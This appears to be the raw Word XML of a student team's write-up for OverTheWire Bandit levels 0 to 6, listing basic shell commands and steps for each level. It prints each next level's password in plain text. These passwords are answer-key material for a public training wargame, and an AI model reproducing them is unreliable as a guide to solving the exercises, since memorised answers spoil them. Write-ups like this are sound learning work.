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6715" w14:textId="286F6AE3" w:rsidR="00B305D3" w:rsidRPr="00250DDC" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00250DDC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63F7287" wp14:editId="5B197CB5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>5044440</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1303020" cy="1163320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="157150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3" t="16719" r="18187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DDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof Of Concept: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Overthewire:</w:t>
      </w:r>
      <w:r w:rsidR="00A43DAF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Bandit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9D70EA" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66374FB0" w14:textId="24E7FF58" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00833A60">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00250DDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submitted to:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Digisuraksha Parhari Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533ED46C" w14:textId="77777777" w:rsidR="00833A60" w:rsidRDefault="00833A60" w:rsidP="00833A60"/>
    <w:p w14:paraId="72F90161" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r w:rsidRPr="00250DDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Team Name: VIPER</w:t>
      </w:r>
      <w:r>
        <w:t>, (</w:t>
      </w:r>
      <w:r w:rsidRPr="00250DDC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vastly Intricate Protocol Enforcement Regiment</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE2C558" w14:textId="77777777" w:rsidR="00833A60" w:rsidRDefault="00833A60" w:rsidP="00B305D3"/>
    <w:p w14:paraId="306850F4" w14:textId="2CF6680C" w:rsidR="00833A60" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r w:rsidRPr="00250DDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Members:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00833A60">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Harini Porumamilla (385), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B6DC66" w14:textId="2C6817DD" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00833A60">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Adwitya Deep Verma (186)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63322020" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6000F58B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6E8A76F3" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1FD8C0E8" w14:textId="6A0B23D5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0 → Level 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596D598C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="531144D2" w14:textId="7322C38D" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: ssh, ls, cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588A1AE2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="45362DD6" w14:textId="138BCC48" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Connect to the Bandit server and find the password for the next level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A894D7F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="106EEA6A" w14:textId="31195358" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `cat readme`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A239FDB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="13B842A4" w14:textId="7C1D9282" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE15C41" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. SSH to bandit.labs.overthewire.org on port 2220 with username bandit0 and password bandit0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469CF8D0" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Used `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ls`</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to list files and found `readme`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F021D2E" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Used `cat readme` to read the file contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F262A7A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="56387012" w14:textId="7C33B577" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E305601" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F603AAF" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B808A5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="443056D7" w14:textId="45990D1A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Basic SSH connection and file reading with cat command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D805917" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2972839A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="17B5728C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="26F81411" w14:textId="38AABC53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1 → Level 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1626944A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="611392A1" w14:textId="4439EF75" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ED09B9" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0E9AD2E1" w14:textId="20099DDC" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Read a file with an unusual name (hyphen `-`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6498BEF4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="52E27FD7" w14:textId="25A17DB2" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `cat ./-`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564F35D8" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="37D17809" w14:textId="5971F337" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F6BF91" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Found file named `-` using `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ls`</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A2016C3" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Used `cat ./-` to read the file (avoiding interpretation as command flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C15FEB3" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="42D8D3EC" w14:textId="3A88F6B0" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1346D5BC" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F824E56" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: 263JGJPfgU6LtdEvgfWU1XP5yac29mFx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65040631" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="666E748B" w14:textId="6594DB28" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Handle special character filenames using path prefixes to prevent flag interpretation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679E42B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE0DD65" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2D64A260" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="08B6179E" w14:textId="0907A009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2 → Level 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB4BA9A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4C67743F" w14:textId="4BE85E49" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E3679C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2A0A9388" w14:textId="4187A2A2" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Read a file with spaces in its name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CA834C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5E1BF1F8" w14:textId="0AB2BEC6" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t xml:space="preserve">Commands Used: `cat </w:t>
      </w:r>
      <w:r w:rsidR="0034564F">
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="0034564F">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>spaces in this filename</w:t>
      </w:r>
      <w:r w:rsidR="0034564F">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E9E91" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3EB61AF6" w14:textId="64E37947" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3513A0" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Found file with spaces in name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3ECD2B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Used quotes to handle spaces in filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51E81F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3342F70E" w14:textId="5FEAC2D6" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0CAF6D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B2AC2F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01845AC6" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4D9B0D49" w14:textId="07BCCA72" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Handle filenames with spaces using quotes or escape characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50597B91" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9304CD" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="04D863B2" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="18E9A976" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7C756094" w14:textId="0493319F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3 → Level 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E070175" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2DCFAA5D" w14:textId="0BDF1510" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: ls, cd, cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C788DB" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0BD9EF96" w14:textId="5DCCF0B9" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find password in a hidden file within the `inhere` directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C8FF8B" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="34005E39" w14:textId="06737E76" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `ls -a`, `cat .hidden`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B8BAC" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="5A9A0C97" w14:textId="4C69A067" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E1E527" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Navigated to `inhere` directory with `cd inhere`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F210361" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Used `ls -a` to show hidden files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B5D89" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Found `.hidden` file and read it with `cat .hidden`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8FF435" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1698923D" w14:textId="00A6A1A3" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762EEC46" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012B2987" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: 2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4C953" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="370C7894" w14:textId="1FDEEEF1" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Use `ls -a` to display hidden files starting with dots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747A9BB5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293273D4" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0748CA6A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="1F6EB234" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3512679A" w14:textId="77777777" w:rsidR="00462DB4" w:rsidRDefault="00462DB4" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0E89E6D4" w14:textId="1DE344A8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4 → Level 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B690DD5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="684494C5" w14:textId="6DABFE4E" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: find, file, cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C3517" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="315D7FEF" w14:textId="333D5B2A" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find human-readable file among many files in `inhere` directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B01BFB9" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="3D251C7C" w14:textId="31469E24" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `find . -type f -exec file {} \;`, `cat ./-file07`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C299B0" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="6B8ECA34" w14:textId="57738734" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF021DA" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Used `find` with `file` command to identify file types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4F96DE" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Located the ASCII text file among binary files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B80FC" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Read the human-readable file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2370488C" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="259BE639" w14:textId="2F6BEA17" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DBD77F" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E70538" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: 4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC00644" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="0ABD3F24" w14:textId="563B0310" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Learning: Use `file` command to identify file types and find human-readable files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192BF2CA" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEA64C8" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="20D88029" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="2CB96DA7" w14:textId="32CD94BC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5 → Level 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B06174" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="69978B69" w14:textId="371D04C1" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Tools Used: find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC270A" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="34029A0D" w14:textId="56C60070" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Objective: Find file with specific properties: human-readable, 1033 bytes, not executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DCC275" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="4A1CE542" w14:textId="2B415CE3" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Commands Used: `find . -type f -size 1033c ! -executable`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5193FE40" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="358DBEF5" w14:textId="4A4DAFA6" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E39173" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>1. Used `find` with multiple conditions to locate specific file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4FB774" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>2. Found file in `./maybehere07/.file2`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3DAC56" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>3. Read the file contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C095F39" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3"/>
    <w:p w14:paraId="7E96CA78" w14:textId="519A6CE0" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E269B5" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Username: bandit6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFE385D" w14:textId="77777777" w:rsidR="00B305D3" w:rsidRDefault="00B305D3" w:rsidP="00B305D3">
      <w:r>
        <w:t>- Password: HWasnPhtq9AVKe0dmk45nxy20cvUa6EG</w:t>
      </w:r>
    </w:p>
